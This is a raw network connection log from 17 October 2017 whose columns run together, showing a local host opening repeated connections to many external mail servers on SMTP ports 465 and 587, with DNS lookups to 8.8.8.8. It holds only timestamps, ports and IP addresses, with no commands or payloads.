Okt 17, 2017 21:54:42.376336098 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.381500006 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:42.381527901 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.383501053 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.383846045 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.383876085 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.384062052 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.384085894 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.419974089 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.420289040 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.420321941 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.420979023 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.421001911 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.424264908 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:42.452255011 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:42.452281952 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:42.452668905 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:42.452698946 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:42.459600925 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:42.459639072 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:42.482947111 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.483839989 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.483877897 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.484105110 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.484134912 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.515430927 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:42.515758038 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:42.515794039 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:42.515969992 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:42.516046047 MESZ46549247217.76.224.5192.168.1.16
Okt 17, 2017 21:54:42.516547918 MESZ49247465192.168.1.16217.76.224.5
Okt 17, 2017 21:54:42.521584988 MESZ5361853192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.585283995 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.586029053 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:42.586072922 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.586657047 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:42.586685896 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.599481106 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.599900007 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.599939108 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.600145102 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.600169897 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.633168936 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.633583069 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:42.633620977 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.633786917 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:42.633810043 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.674877882 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.674911022 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:42.675309896 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.675354004 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.675637960 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.675715923 MESZ4654924385.13.128.99192.168.1.16
Okt 17, 2017 21:54:42.675831079 MESZ49243465192.168.1.1685.13.128.99
Okt 17, 2017 21:54:42.682028055 MESZ6372853192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.700649977 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.701016903 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.701055050 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.701214075 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.701240063 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.738176107 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.738564968 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:42.738605976 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.738791943 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:42.738814116 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:42.769284964 MESZ4654925494.152.8.23192.168.1.16
Okt 17, 2017 21:54:42.769484997 MESZ49254465192.168.1.1694.152.8.23
Okt 17, 2017 21:54:42.769768000 MESZ49254465192.168.1.1694.152.8.23
Okt 17, 2017 21:54:42.769804001 MESZ4654925494.152.8.23192.168.1.16
Okt 17, 2017 21:54:42.775572062 MESZ6084253192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.783135891 MESZ53536188.8.8.8192.168.1.16
Okt 17, 2017 21:54:42.783199072 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.784470081 MESZ49255587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:42.784522057 MESZ58749255212.77.101.1192.168.1.16
Okt 17, 2017 21:54:42.784673929 MESZ49255587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:42.785226107 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:42.785260916 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.785819054 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:42.785846949 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:42.876487017 MESZ46549231213.90.36.113192.168.1.16
Okt 17, 2017 21:54:42.876609087 MESZ49231465192.168.1.16213.90.36.113
Okt 17, 2017 21:54:42.901932001 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:42.901973963 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.903733015 MESZ49248587192.168.1.16213.145.228.17
Okt 17, 2017 21:54:42.903846025 MESZ58749248213.145.228.17192.168.1.16
Okt 17, 2017 21:54:42.904530048 MESZ49248587192.168.1.16213.145.228.17
Okt 17, 2017 21:54:42.904623985 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:42.904648066 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.904907942 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:42.904922962 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:42.908085108 MESZ5599953192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.909002066 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.909347057 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.909389019 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.909607887 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.909670115 MESZ4654924946.229.230.234192.168.1.16
Okt 17, 2017 21:54:42.910314083 MESZ49249465192.168.1.1646.229.230.234
Okt 17, 2017 21:54:42.913744926 MESZ5469553192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.918979883 MESZ53637288.8.8.8192.168.1.16
Okt 17, 2017 21:54:42.919972897 MESZ49256587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:42.920003891 MESZ58749256212.77.101.1192.168.1.16
Okt 17, 2017 21:54:42.920223951 MESZ49256587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:42.935663939 MESZ58749255212.77.101.1192.168.1.16
Okt 17, 2017 21:54:42.935700893 MESZ58749255212.77.101.1192.168.1.16
Okt 17, 2017 21:54:42.935894966 MESZ49255587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:42.940793037 MESZ49255587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:42.940817118 MESZ58749255212.77.101.1192.168.1.16
Okt 17, 2017 21:54:42.942785978 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.944986105 MESZ5023753192.168.1.168.8.8.8
Okt 17, 2017 21:54:42.945199013 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.945223093 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.945458889 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.945513964 MESZ46549251195.202.128.4192.168.1.16
Okt 17, 2017 21:54:42.945590019 MESZ49251465192.168.1.16195.202.128.4
Okt 17, 2017 21:54:42.949193001 MESZ6518053192.168.1.168.8.8.8
Okt 17, 2017 21:54:43.046266079 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:43.046545029 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:43.046566010 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:43.047228098 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:43.047246933 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:43.051275969 MESZ53608428.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.052462101 MESZ49257587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.052493095 MESZ58749257212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.052599907 MESZ49257587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.085822105 MESZ58749256212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.085870028 MESZ58749256212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.086256027 MESZ49256587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.089591026 MESZ49256587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.089615107 MESZ58749256212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.093003988 MESZ5741453192.168.1.168.8.8.8
Okt 17, 2017 21:54:43.093029976 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:43.093713999 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:43.093732119 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:43.094583988 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:43.094594955 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:43.195643902 MESZ53559998.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.197031021 MESZ49258587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.197081089 MESZ58749258212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.197184086 MESZ49258587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.275994062 MESZ58749257212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.276032925 MESZ58749257212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.276225090 MESZ49257587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.282774925 MESZ49257587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.282809019 MESZ58749257212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.326961994 MESZ58749258212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.326998949 MESZ58749258212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.327184916 MESZ49258587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.333652973 MESZ49258587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.333686113 MESZ58749258212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.387650013 MESZ53546958.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.388992071 MESZ49259587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.389043093 MESZ58749259212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.389147997 MESZ49259587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.421097040 MESZ53651808.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.421772003 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.421798944 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.422538042 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.422861099 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.422878027 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.430176020 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.430506945 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.430526972 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.430617094 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.430629969 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.484106064 MESZ53502378.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.485027075 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:43.485075951 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:43.485182047 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:43.504606009 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:43.504914045 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:43.504940987 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:43.505075932 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:43.505095005 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:43.517910957 MESZ58749259212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.517947912 MESZ58749259212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.518090963 MESZ49259587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.523874044 MESZ49259587192.168.1.16212.77.101.1
Okt 17, 2017 21:54:43.523907900 MESZ58749259212.77.101.1192.168.1.16
Okt 17, 2017 21:54:43.578445911 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.578469992 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.578479052 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.578608990 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.590445995 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.596880913 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.596911907 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.597601891 MESZ53574148.8.8.8192.168.1.16
Okt 17, 2017 21:54:43.598962069 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:43.599000931 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:43.599497080 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:43.643699884 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:43.645440102 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:43.645461082 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:43.646725893 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:43.646744967 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:43.650964975 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.651149988 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.651169062 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.657361984 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.657380104 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.673891068 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.717499018 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:43.718256950 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:43.718277931 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:43.718744993 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:43.718759060 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:43.787441969 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:43.787470102 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:43.789154053 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:43.789175034 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:43.789272070 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:43.789285898 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:43.797665119 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:43.797683954 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:43.798168898 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:43.798183918 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:43.847866058 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:43.848942995 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:43.848973036 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:43.849297047 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:43.849374056 MESZ5874925274.125.205.108192.168.1.16
Okt 17, 2017 21:54:43.850272894 MESZ49252587192.168.1.1674.125.205.108
Okt 17, 2017 21:54:43.876482010 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.876549959 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.876725912 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.876748085 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.877018929 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:43.877036095 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:43.893574953 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:43.894746065 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:43.894769907 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:43.894925117 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:43.894943953 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:43.902142048 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:43.904123068 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:43.904148102 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:43.904514074 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:43.904532909 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:44.018666029 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.018698931 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.019891977 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.019928932 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.020344019 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:44.020374060 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.021416903 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:44.021442890 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.021667957 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:44.021693945 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.034116030 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.034517050 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:44.034554005 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.034717083 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:44.034739971 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.111896038 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:44.112818003 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:44.112854958 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:44.113014936 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:44.113037109 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:44.130865097 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:44.131458044 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:44.131494045 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:44.131652117 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:44.131674051 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:44.160396099 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.160418034 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.160427094 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.160621881 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.203670025 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.285579920 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.285764933 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:44.285787106 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.287324905 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:44.287341118 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.294446945 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:44.296072006 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:44.296176910 MESZ58749233213.186.33.155192.168.1.16
Okt 17, 2017 21:54:44.297327995 MESZ49233587192.168.1.16213.186.33.155
Okt 17, 2017 21:54:44.337522984 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:44.338196993 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:44.338304043 MESZ58749262212.33.55.20192.168.1.16
Okt 17, 2017 21:54:44.339643955 MESZ49262587192.168.1.16212.33.55.20
Okt 17, 2017 21:54:44.347250938 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.347270966 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.412337065 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.412566900 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:44.412589073 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.416501999 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:44.416520119 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.520742893 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.521495104 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.521517992 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.521979094 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.521994114 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.655348063 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.655821085 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.655849934 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.656192064 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.656210899 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.777648926 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.778053045 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:44.778089046 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.778259039 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:44.778280973 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.821590900 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.821913004 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.821949005 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.822175026 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.822247028 MESZ5874926181.19.149.200192.168.1.16
Okt 17, 2017 21:54:44.822356939 MESZ49261587192.168.1.1681.19.149.200
Okt 17, 2017 21:54:44.849791050 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.850140095 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:44.850179911 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.850430965 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:44.850455999 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:44.956549883 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.956948042 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:44.956984997 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:44.957559109 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:44.957587004 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:45.119792938 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:45.119841099 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:45.119940042 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:45.120114088 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:45.120140076 MESZ46549253153.92.65.114192.168.1.16
Okt 17, 2017 21:54:45.120269060 MESZ49253465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:45.294600964 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:45.295392990 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:45.295416117 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:45.296051025 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:45.296067953 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:45.690675020 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:45.691102982 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:45.691138983 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:45.691323042 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:45.691345930 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:45.692267895 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:45.692289114 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:45.692533970 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:45.692557096 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.060225964 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.060623884 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:46.060650110 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.060794115 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:46.060812950 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.206777096 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:46.206815958 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:46.207005024 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:46.207252026 MESZ49260465192.168.1.16153.92.65.114
Okt 17, 2017 21:54:46.207288027 MESZ46549260153.92.65.114192.168.1.16
Okt 17, 2017 21:54:46.506194115 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.506683111 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:46.506722927 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.506899118 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:46.506923914 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.939282894 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.939522982 MESZ49196465192.168.1.16108.167.137.14
Okt 17, 2017 21:54:46.939553022 MESZ46549196108.167.137.14192.168.1.16
Okt 17, 2017 21:54:46.939748049 MESZ49196465192.168.1.16108.167.137.14
